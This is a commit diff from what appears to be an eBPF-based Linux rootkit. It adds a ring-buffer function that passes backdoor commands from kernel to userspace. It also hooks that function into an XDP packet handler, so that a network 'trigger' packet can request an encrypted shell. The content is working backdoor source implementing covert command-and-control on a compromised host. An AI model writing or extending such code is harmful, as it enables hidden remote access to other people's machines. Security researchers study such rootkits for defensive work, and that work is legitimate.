Completed message passing of commands to userspace via ebpf ringbuffer

src/ebpf/include/data/ring_buffer.h

@@ -41,6 +41,25 @@ static __always_inline int ring_buffer_send(struct ring_buffer *rb, int pid, eve
 	bpf_ringbuf_submit(event, 0);
     return 0;
 }
+
+/**
+ * @brief Sends an event indicating a received command in the backdoor
+ * 
+ * @return 0 if ok, -1 if error
+ */
+static __always_inline int ring_buffer_send_backdoor_command(struct ring_buffer *rb, int pid, int code){
+    struct rb_event *event = (struct rb_event*) bpf_ringbuf_reserve(rb, sizeof(struct rb_event), 0);
+    if(!event){
+        return -1;
+    }
+
+    event->code = code;
+    event->event_type = COMMAND;
+    event->pid = pid;
+
+	bpf_ringbuf_submit(event, 0);
+    return 0;
+}
     
 
 

src/ebpf/include/xdp/backdoor.h

@@ -4,6 +4,10 @@
 #include "headervmlinux.h"
 
 #include <bpf/bpf_helpers.h>
+#include <bpf/bpf_tracing.h>
+#include <bpf/bpf_core_read.h>
+
+#include "../data/ring_buffer.h"
 #include "../../common/c&c.h"
 
 static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 payload_size){
@@ -73,9 +77,11 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
 
     //If we reach this point then we received trigger packet
     bpf_printk("Finished backdoor V1 check with success\n");
+    int pid = -1; //Received by network stack, just ignore
     switch(command_received){
         case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1:
             bpf_printk("Received request to start encrypted connection\n");
+            ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
             break;
         default:
             bpf_printk("Command received unknown: %d\n", command_received);